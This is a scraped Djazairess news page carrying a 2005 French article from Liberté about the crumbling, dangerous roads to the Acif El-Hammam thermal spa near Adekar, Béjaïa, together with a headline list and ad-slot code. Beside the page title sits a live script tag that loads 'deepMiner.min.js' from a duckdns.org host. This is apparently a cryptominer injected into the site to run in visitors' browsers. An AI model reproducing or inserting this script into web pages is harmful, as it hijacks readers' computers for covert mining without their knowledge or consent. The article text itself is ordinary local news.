googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Tous les chemins ne mènent pas à Acif El-Hammam<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Tous les chemins ne mènent pas à Acif El-Hammam
ADEKAR (BEJAIA)
Publié dans Liberté le 03 - 10 - 2005

L'état de dégradation avancé des routes menant à la station thermale est dangereux et offre un spectacle désolant.
S'il y a bien une localité au niveau de la wilaya de Béjaïa qui demeure encore le parent pauvre du programme de développement local, lancé par la commune d'Addekar, c'est incontestablement Acif El Hammam. Cette région, énormément prisée par les touristes en quête d'escapade et d'évasion, reste, cependant, moins bien lotie en constructions et aménagement des routes. Ce faubourg, comme son nom l'indique si bien, recèle des atouts indéniables d'une grande station touristique et “accueille” tout au long de l'année des milliers de touristes venus des quatre coins du pays. Néanmoins, cet essor économique de ces derniers temps, depuis l'amélioration de la sécurité dans ces lieux paradisiaques, risque d'être compromis au vu de l'état de dégradation avancé des routes. Cette station thermale, qui constitue le fleuron des collines d'Adekar, ne mérite aucunement le sort qu'il lui a été réservé. À l'heure de la grande manne pétrolière et des grands chantiers lancés à travers le pays, dans le cadre du plan quinquennal (2005-2009), Acif El Hammam n'est même pas doté d'une route digne d'une région touristique. Le chemin, pardon, le sentier menant à cette station thermale depuis la RN12 à partir d'Aguemoune, en passant par Aït Yahia, est assimilé à un champ de pâturage. Le spectacle est désolant. En roulant sur ce chemin, il n'est pas exclu de se heurter à un bloc de terre après un glissement de terrain la veille. Si, par hasard, deux véhicules légers se croisaient, aucun des deux ne pourrait passer, tellement la chaussée est étroite. Alors que dire lorsqu'il s'agit de deux camions ! D'ailleurs, les habitués de ces lieux déconseillent aux automobilistes étrangers d'emprunter ce chemin en hiver, car le risque de laisser sa voiture au milieu de la chaussée est très élevé. “Les nids-de-poule se transforment pendant l'hiver en poches de boue. Commence alors pour les automobilistes le patinage artistique”, s'indigne un habitant d'Aït Yahia. Et d'ajouter avec amertume : “En hiver, des scènes affligeantes se succèdent sur ce tronçon routier, puisque Acif El-Hammam se retrouve carrément isolé et enclavé dès les premières chutes de neige.” C'est une route qui est dans un état extrêmement critique et qui présente un danger permanent. “C'est une allée qui est devenue exiguë et étriquée même pour un baudet”, ironise un autre habitant du village voisin.
Avec l'usure du temps, ce sentier est en train de se rétrécir jour après jour, sans que les autorités locales daignent trouver une solution. Cet état de fait perturbe depuis des années et enclave davantage cette agglomération. Cette situation n'a laissé personne indifférent.
Les commerçants d'Acif El-Hammam et les membres des associations de villages de Timri, Tighzert, Ighil Lekroune, Tazrout, Aït Malek, Ahriz, Henied, Hammam Centre, Kiria, Aït Yahia et Aghelad ont, maintes fois, adressé des réclamations écrites aux autorités compétentes, à savoir l'APC, le chef de daïra et même le wali, vainement. Le problème risque encore de s'aggraver.
H. H.


Cliquez ici pour lire l'article depuis sa source.